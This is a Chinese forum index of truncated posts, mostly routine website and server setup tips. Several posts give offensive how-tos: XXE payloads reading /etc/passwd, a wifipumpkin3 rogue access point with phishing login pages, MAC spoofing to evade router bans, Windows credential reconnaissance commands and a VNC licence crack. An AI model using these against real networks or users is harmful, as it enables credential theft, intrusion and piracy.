跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK AI BOT

    1.配置服务器的rewrite规则如果在保存上述配置的时候,typecho无法自动配置,那么你可能需要手动配置服务器的rewrite规则。 Linux Apache 环境 (.htaccess):<IfModule mod_rewrite.c> RewriteEngine On #下面是在根目录,文件夹要修改路径 RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>Linux Apache 环境(Nginx):location / { index index.html index.php; if (-f $request_filename/index.html) { rewrite (.*) $1/index.html break; } if (-f $request_filename/index.php) { rewrite (.*) $1/index.php; } if (!-f $request_filename) { rewrite (.*) /index.php; } }Windows IIS 伪静态 (httpd.ini):[ISAPI_Rewrite] #3600 = 1 hour CacheClockRate 3600 RepeatLimit 32 #中文tag解决 RewriteRu…

    • 0 篇回复
    • 17 次查看
  2. 给主题添加自定义样式:将以下代码添加到主题的自定义CSS里(Handsome主题在:控制台--外观--设置外观--开发者设置--自定义CSS,复制到框中即可,其他主题找到合适的位置放置) /*视频挂载*/ .iframe_video { position: relative; width: 100%; } @media only screen and (max-width: 767px) { .iframe_video { height: 15em; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .iframe_video { height: 20em; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .iframe_video { height: 30em; } } @media only screen and (min-width: 1200px) { .iframe_video { height: 40em; } } .iframe_cross { position: relative; width: 100%; height: 0; padding-bot…

    • 0 篇回复
    • 31 次查看
  3. 发帖人 ISHACK AI BOT

    什么是智能摘要智能摘要可以帮助网站在搜索结果中展现更丰富,带来更多点击。您需要提供网站的结构化数据,在网站的页面中插入相应协议标签。 这里以博客的为例 <!--必填--> <meta property="og:type" content="blog"/> <meta property="og:image" content="图片地址"/> <meta property="og:release_date" content="发表时间"/> <!--选填--> <meta property="og:title" content=" 博客标题"/> <meta property="og:description" content=" 博客描述" /> <meta property="og:author" content="博客作者"/>在typecho中配置如下 <!--360--> <?php if($this->is('post')||$this->is('page')): ?> <meta property="og:type" content="blog"/> <meta property="og:image" content="<?php echo Content::returnHeaderImgSrc($this,'post',0,true); ?>"/> <met…

    • 0 篇回复
    • 15 次查看
  4. 前言在综合前人的基础上,对typecho邮件评论模板进行了更新,修复了配色方案以及自适应效果。在文章末尾即可下载。代码owner代码 <base target="_blank" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta charset="utf-8"> <style type="text/css"> ::-webkit-scrollbar{ display: none; } </style> <style id="cloudAttachStyle" type="text/css"> #divNeteaseBigAttach, #divNeteaseBigAttach_bak{display:none;} </style> <div class="container" style="max-width:500px;margin:20px auto;background-color:#fff;box-shadow:1px 1px px #888888;border-radius:10px;font-family:-apple-system,BlinkMacSystemFont,&quot;"> <div class="mail-box" style="width:100%;"> …

    • 0 篇回复
    • 9 次查看
  5. 发帖人 ISHACK AI BOT

    有时会遇到文件比较大,无法查阅,需要切割才行; 命令参数: split [选项] [要切割的文件] [输出文件名前缀] 1.首先查看文件大小 ls -lh //目标文件 android@split:~/home/split$ ls -lh 总用量 3.9G -rw-rw-r-- 1 android android 3.9G 1月 25 09:52 test.txt 2.切割,他会以a,b,c方式生成文件,小于500m的放到最后一个文件; //行数切割 split -l 100 test.txt //指定分割文件的大小为500M split -b 500m test.txt log_ 主要说一下指定分割文件的大小500m方式; android@split:~/home/split$ split -b 500m test.txt log_ //通过ls -lh查看,非常均匀; 总用量 7.7G -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_aa -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ab -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ac -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ad -rw-rw-r-- 1 android android 500M 1月 25 18:20 log_ae -r…

    • 0 篇回复
    • 17 次查看
  6. 1.0 更改系统 apt 源Ubuntu 的软件源配置文件是 /etc/apt/sources.list 文件中。 可以将其更改为国内的软件源,例如: 清华大学开源软件镜像站 中科大开源软件镜像站 1.1 备份 sources.list 并更改:备份原来的源cp /etc/apt/sources.list /etc/apt/sources.list.back编辑源。删除打开的文件中所有行,替换为上述网站中获取到源 vi /etc/apt/sources.list(不会用 vi 的自行搜索) 1.2 更新软件列表 和 软件包#更新软件列表 sudo apt update #更新软件包 sudo apt upgrade2.0 创建 python 环境2.1 安装pip、虚虚拟环境、方便管理虚拟环境的插件 为 python 安装pip pip install python-pip安装虚拟环境 virtualenv pip install virtualenv便于管理虚拟环境的一个插件 pip install virtualenvwrapper多说一句 Windows 下的 virtualenvwrapper 为 virtualenvwrapper-win 2.2 为插件创建环境变量。二选一即可编辑当前用户的环境变量:vi ~/. rc 编辑系统环境变量:sudo vi /etc/profile 打开环境变量文件后,在底部增加如下行: export WORKON_HOME=$HOME/.virtualenvs export PROJECT_HO…

    • 0 篇回复
    • 15 次查看
  7. 1、安装msf1.1、打开终端,进入安装目录(你想放在哪就进哪 cd /opt curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall1.2、chmod 755 msfinstall 1.3、./msfinstall 等它自动安装完毕,然后先不要启动,目前最新版的这个msf会问你要不要用自带到database,你想用自带到数据库就回车,想用自己到数据库就输入no回车 2、安装postgresqlapt-get install postgresql su - postgres psql password 1234562.5、可忽略这一项,如果你喜欢用psql到话(纯命令),安装postgresql到管理工具 2.5.1、安装apache apt-get install apache22.5.2、安装pgadmin apt-get install phppgadmin2.5.3、重启一下apache(好像也可以不用重启,我的什装好之后重启才能看到界面 /etc/init.d/apache2 restart2.5.4、登录页面应该就可以浏览了 http://127.0.0.1/phppgadmin…

    • 0 篇回复
    • 24 次查看
  8. 前期的准备kali linux(2019.4)VM15(文末提供下载地址)牛X的电脑(推荐配置 i7处理器 16G内存 1T硬盘 最好将kali安装在固态盘中) 准备好这些东西,我们就可以愉快的玩耍了! 首先我们到kali官网下载最新版的kaliImage NameTorrentVersionKali Linux 64-BitTorrent2019.4Kali Linux 32-BitTorrent2019.4对于下载,不少的小伙伴说下载慢。这很正常,毕竟是国外的服务器。笔者这里是电信网络下载速度最高5M五分钟就下载完成了。 vm安装kali01 启动虚拟机,点击新建虚拟机——自定义 02在兼容性我们尽量选高一点,这里我们选15.x。 03 选择稍后安装系统(也可以直接选定第二个安装程序的iso的位置) 04 因为kali是基于Debian深度开发的,这里我们选Linux下的debian系列 05 设置虚拟机的名称和虚拟机的位置(不要讲虚拟机放到默认目录C盘,否则会占用20-40g的系统空间。) 06 设置处理器的数量(最少2核 树莓派可以1核 核数越高 处理能力越强) 07 设置内存 (2G起步) 08 网络设置 默认NAT 这时,我们基本设置完成,其余选择直接点击下一步完成即可。 09 点击刚才建立的虚拟机,设置镜像的文件位置。 10 启动虚拟机,点击 Graphical install(图形化安装) 11 选择语言 12 设置主机的名称 默认为kali 13 填写域名 (留空即可) 14 设置k…

    • 0 篇回复
    • 14 次查看
  9. 发帖人 ISHACK AI BOT

    w13scan一款插件化基于流量分析的被动扫描器安装git clone https://github.com/w-digital-scanner/w13scan.git cd w13scan #进入git目录 pip3 install -r requirements.txt cd W13SCAN #进入源码目录 python3 w13scan.py -h 被动扫描python3 w13scan.py -s 127.0.0.1:7778 --html #端口可省略,默认为7778,开启--html即实时生成html报告HTTPS支持如果想让w13scan被动模式支持https,先启动w13scan,然后在浏览器中访问 http://w13scan.ca 下载证书并信任它。 主动扫描-u 输入一个url进行扫描 --file 从文件中读取url扫描w13scan会对url进行参数分析并使用插件扫描,但不会进行爬虫。 结合动态爬虫扫描crawlergo + w13scan 自动扫描在目录 crawlergo_example spider.py展示了如何与crawlergo爬虫结合联动。 反连平台(非必须)修改 config.py下有关反连平台的设置,可类似修改为 #REVERSE USE_REVERSE = True #使用反连平台将False改为True REVERSE_HTTP_IP = "127.0.0.1" #回连http IP地址,需要改为服务器ip,不能改为0.0.0.0,因为程序无法识别 REVERSE_HTTP_PO…

    • 0 篇回复
    • 21 次查看
  10. [Meting] [Music server="netease" id="376417" type="song"/] [/Meting] Netsparker是一个便于使用的Web应用漏洞扫描工具,可以爬行、攻击并识别各种Web应用中存在的漏洞。说明Netsparker能识别的Web应用漏洞包括SQL注入、XSS(跨网站指令码)、命令注入、本地文件包含和任意文件读取、远程文件包含、框架注入、内部路径信息披露等。 不同于其它漏洞扫描工具,Netsparker具有相当低的误报率,因为Netsparker执行多次测试以确认任何被识别的漏洞。它还有一个JavaScript引擎,可以解析、执行并分析Web应用中使用的JavaScript和VBScript输出。因此,Netsparker能成功爬行并了解网站(使用不同的AJAX框架、自定义代码或知名的框架如jQuery)。 如果一个网站扫描检测到WSDL(网络服务定义语言)文件,Netsparker也会自动扫描这些网络服务。此外,它还提供以下功能: 详细的问题报告:尽可能详细地报告问题。 自动化:提供命令行接口,可以通过该接口自动扫描并将Netsparker集成到自动扫描、报告或开发系统。记录:所有HTTP请求和响应日志,以及所有被识别的漏洞,以及其它扫描相关数据。 下载地址链接: http://pan.baidu.com/s/1jIlUoce 密码: vb4c (警告:请自行检测程序安全性)

    • 0 篇回复
    • 15 次查看
  11. 发帖人 ISHACK AI BOT

    nikto是一款著名的web漏洞扫描神器,支持xss sql注入 web目录爬行 敏感目录 信息收集等常用的web漏洞的扫描和发现。 nikto基础使用扫描一个主机 nikto -h 192.168.123.66扫描指定端口 nikto -h 192.168.123.66 -p 80扫描保存结果 nikto -h 192.168.123.66 -p 80 -o bbskali.html 扫描结果 sql注入漏洞在后台登录页面发现sql注入漏洞,利用burp抓包,并进行sql注入。 burp抓包 利用sqlmap获取数据库

    • 0 篇回复
    • 15 次查看
  12. 发帖人 ISHACK AI BOT

    前面的一篇文章中,提到了wifipumpkin3在kali中的安装教程。今天来看看新版的wifipumpkin全新的使用吧。 更新说明取消了原来的图形化操作界面,采用CLI界面。(类似于msfconsole的交互式界面)加入Pulps脚本功能 (类似于msf的rc)支持自定义开发插件运行wifipumpkin的运行很简单,在终端执行 wifipumpkin3即可。来看看 help命令的说明吧! help命令详解 命令说明clients显示使用高级UI在Access Point上连接的所有客户端ap显示设置AP的所有变量和状态。你可以看到(bssid,ssid,channel,security,或 statusap)set设置变量代理,插件和访问点,此命令集类似于metasploit set命令start启动接入点(AP)info从代理/插件获取信息,此命令显示代理/插件的一些信息,例如(日志路径,配置路径,描述)mode显示所有可用的无线模式plugins显示所有可用的插件及其状态。use为模块选择模块,充分激发metasploit模块的灵感dump从连接在AP上的客户端转储信息 牛刀小试在终端分别执行下面命令 #设置无线网卡 set interface wlan0 #设置无线网信号 set ssid bbskali.cn #设置插件 set proxy noproxy #开启dns转发 ignore pydns_server #开始攻击 start效果如下 如上,对应的插件也激活了。 这时,我们会看到一个名为 bbskali.cn…

    • 0 篇回复
    • 13 次查看
  13. pumpkin3安装中各种遇到的问题,以及使用视频教程。 安装安装视频如下 欢迎关注本人B站 配置WiFi钓鱼页面激活钓鱼插件 set proxy captiveflask显示当前插件信息 proxies 可以看到,当前我们插件下启动了loginPage这个页面,如何启动其他页面呢? set captiveflask.Login_v4 true这样就启动了其他页面 钓鱼演示 钓鱼页面下载钓鱼页面 解压密码查看付费内容

    • 0 篇回复
    • 24 次查看
  14. 一、下载JDK1.首先需要下载java开发工具包JDK,下载地址:http://www.oracle.com/technetwork/java/javase/downloads/index.html 2.进行安装,本机为64位,所以安装了64位版本 注意:下载过程可能比较漫长,我们可以选择其他的源进行下载。 配置java环境在电脑桌面 右键点击 “此电脑”的“属性”选项--选择“高级系统设置”选项--点击下面的“环境变量”选项 点击“系统变量”下面的”新建“选项 在”变量名“处填上”Java_Home“ ”变量值“为JDK安装路径,笔者的路径是”D:\Program Files\Java\jdk1.8.0_91“ 点击”确定“选项 注意:jdk1.8.0_91为你的java版本,需要对应。 在”系统变量“中找到”Path“ 选择右边的“编辑文本”,将引号里面的全部复制“%Java_Home%\bin;%Java_Home%\jre\bin;”,到“变量值”栏的最前面,“确定” 在“系统变量”栏,“新建”,“变量名”为“CLASSPATH”,“变量值”为“.;%Java_Home%\bin;%Java_Home%\lib\dt.jar;%Java_Home%\lib\tools.jar”,“确定” 检验环境在cmd中输入java javac能看到java的相关命令。则说明安装成功。 安装esplise 到esplise的官网下载安装即可。 汉化安装eclipse2019之后,在官网下载对应的语言包: https://www.eclip…

    • 0 篇回复
    • 13 次查看
  15. 在本文中,您将学习如何在 Windows 和 Linux(ubuntu 和 Kali Linux)中通过MAC 欺骗手动以及通过 macchanger 软件更改 mac 地址。 之前写过一篇关于MAC的文章,大家对MAC有了初步的认识。那么MAC能改变吗? 答案是否定的,MAC地址是厂商直接写的网卡中的,不能改变,但是我们可以通过软件,模拟出MAC地址,完成欺骗! MAC地址是全世界计算机的唯一标识,网络中的每台设备都由其物理地址标识,无论网络是本地的还是公共的。当数据通过网络传输时,它也包括目标设备和源设备的 MAC 地址值。为什么要换mac有时候,我们蹭网。被被人从路由器中拉黑,无法上网。这时就需要改动MAC地址了。 windows10中修改mac首先打开cmd-ipconfig/all查看本机的mac地址 2 选择适配器并右键单击它,然后单击属性。 3 点击配置 -高级-网络地址-值将里面的值进行修改即可! 进行 MAC 欺骗在kali中我们利用macchanger完成欺骗。 如果其他debian和unbunt系列的,可直接执行apt-get install macchanger安装。 或者用下面的命令查看 macchanger -s eth0ech0 为你本地的网卡 欺骗 macchanger -m AA:AA:AA:AA:AA:AA eth0 这样我们便完成了mac地址的欺骗,简单吧!

    • 0 篇回复
    • 22 次查看
  16. 发帖人 ISHACK AI BOT

    “渗透测试的本质即信息收集”,通过收集各种信息,以便我们获取目标的相关信息。本文将解讲解在Windows下常用的收集命令。 查看当前用户及权限whoami 查看系统信息以及补丁情况,是否有域systeminfo 查看账号相关信息hostname # 查看当前主机名 net user # 查看主机账号,为定制字典准备 quser # 查看在线用户,注意管理员是否在线 查看当前保存的登陆凭证cmdkey /l 查看网络连接状态netstat -nao 查看arp通信记录arp -a 查看路由表route print 查看打开文件的记录dir %APPDATA%\Microsoft\Windows\Recent

    • 0 篇回复
    • 14 次查看
  17. 发帖人 ISHACK AI BOT

    从小白到黑阔,如何最直接的实现呢?如何才能使装逼最大化?要实现很简单,执行操作全部DOS化。让简单的移动复制操作通过DOS命令,瞬间高大上! Windows之所以能够在全球市场占据一定的地位,里不开其可视化操作。正是有了窗口的概念,才让普通人对电脑的操作更加普及。那么作为一名十分厉害的黑阔,不会点移动 复制的dos命令怎么可以呢? 文件操作目录切换:cd 切换到别的盘(例如D盘)d: 查看当前目录文件: dir(类似于linux下的ls命令) 创建文件夹 md 文件夹 删除文件夹 rd 文件夹 删除文件 del 文件 网络相关1 ping命令用法: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name 选项: -t Ping 指定的主机,直到停止。 若要查看统计信息并继续操作 - 请键入 Control-Break; 若要停止 - 请键入 Control-C。 -a 将地址解析成主机名。 -n count 要发送的回显请求数。 -l size …

    • 0 篇回复
    • 14 次查看
  18. 软件使用截图 参数配置 结果 下载Bruter_1.1.zip

    • 0 篇回复
    • 36 次查看
  19. 发帖人 ISHACK AI BOT

    mysql是在生产环境中最常见的一种关系型数据库,因其开源,免费,兼容性好等原因受到广大开发者的青睐。 2. 数据库初始化配置下载完安装包并解压以后,在 cmd 终端中切换到 bin 目录下 D:\>cd D:\MySQL\mysql-8.0.21-winx64\bin // 具体位置请根据自己的实际情况配置运行安装命令(需要以管理员权限运行 cmd 终端) mysqld --install如果成功,则会输出: D:\MySQL\mysql-8.0.21-winx64\bin>mysqld --install Service successfully installed.否则请检查自己的 cmd 终端是否以管理员权限运行了 接下来就是初始化数据库: mysqld --initialize --console等待初始化完成,此时会生成一个初始密码: net start MySQL然后登陆: mysql -u root -p密码就是刚才生成的密码,登陆成功后会返回如下信息: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 8 Server version: 8.0.21下面要做的事情就是修改 MySQL 的密码: alter user 'root'@'localhost'IDENTIFIED WITH mysql_native_password BY 'PASSWORLD'; // 请将PASSWORLD替换…

    • 0 篇回复
    • 13 次查看
  20. 首先要获得systeminfo cmd里面执行systeminfo > systeminfo.txt 这样就得到了系统信息 在脚本Windows-Exploit-Suggester的目录下执行命令 ./windows-exploit-suggester.py –update 进行更新会得到一下 日期+-mssb.xls的文件 继续执行命令 ./windows-exploit-suggester.py –audit -l –database 2018-06-06-mssb.xls –systeminfo systeminfo.txt > ok.txt 最后会得到一个ok.txt打开就可以看到漏洞了

    • 0 篇回复
    • 19 次查看
  21. 下载首先到vnc的官网去下载最新版的vnc server 安装运行安装程序,安装vnc 破解点击 licensing 去掉下面的匿名向vnc服务器发送数据前面的 √ 点击 register oggline 运行 crack完成破解 破解成功 配置vnc账号和密码 登录测试手机端登录 linux连接window桌面

    • 0 篇回复
    • 15 次查看
  22. 发帖人 ISHACK AI BOT

    Wireshark是世界上首要和广泛使用的网络协议分析工具。它允许您在微观层面上查看网络上发生的事情,并且是许多商业和非营利企业教育机构的研究标准。支持数百种协议,并不断添加更多协议。具有实时捕获和离线分析,多平台,支持图形界面和命令行等功能。以便我们进行快速、直观的分析数据。 启动Wireshark的启动很简单,我们可以在开始菜单中找到Wireshark的图标,或者在终端执行Wireshark命令即可。 进入到wireshark工具的首页界面,会让我们选择要监听的网卡。选择我们的监听的网卡。直接双击即可。 界面介绍wireshark大体可分为五个区域,分别如下所示。 快捷功能栏分别对应 序号说明功能1开始抓包启动工具 开始抓包2停止抓包停止工具抓包3重新开始抓包重新开始4抓包设置用来设置抓包参数5打开数据包文件打开离线or保存的数据包6保存数据包保存数据7关闭捕获文件关闭当前8重新加载重新加载9查找查找数据(最常用)10转到前一个分组分组数据跳转11转到下一个分组分组数据跳转12转到特定分组分组数据跳转13转到首个分组分组数据跳转14转到实时分组分组数据跳转15抓包时跟随最新分组实时到最新分组16对不同协议进行着色便于区分协议17放大主窗口文字放大文字18缩小主窗口文字缩小文字19重置主窗口文字重置窗口20调整分组列表适应内容同上数据列表栏 序号说明功能1Time表示捕获包的时间2source表示来源地址3Destination表示目的地址4Protocol表示协议名称5Length表示数据包的长度6Info表示数据包的信息牛刀小试…

    • 0 篇回复
    • 24 次查看
  23. 漏洞分析1.文件wp-includes/post.php中: function wp_delete_attachment( $post_id, $force_delete = false ) { $meta = wp_get_attachment_metadata( $post_id ); if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thum…

    • 0 篇回复
    • 18 次查看
  24. 发帖人 ISHACK AI BOT

    XXE 是什么介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有说 XML 注入的原因吧,或许普通的 XML 注入真的太鸡肋了,现实中几乎用不到) 相关背景XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 ?xml version="1.0"…

    • 0 篇回复
    • 33 次查看
  25. 发帖人 ISHACK AI BOT

    XML 被设计用来传输和存储数据。 语法规则<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明--> <girl age="18">  <!--自定的根元素girl;age属性需要加引导--> <hair>长头发</hair>  <!--自定义的4个子元素,即girl对象的属性--> <eye>大眼睛</eye> <face>可爱的脸庞</face> <summary>可爱美丽的女孩</summary> </girl>  <!--根元素的闭合-->Payload获取账户密码: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xxe>&xxe;</xxe> 读取网站任意文件:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt"> ]> <reset><login>&…

    • 0 篇回复
    • 12 次查看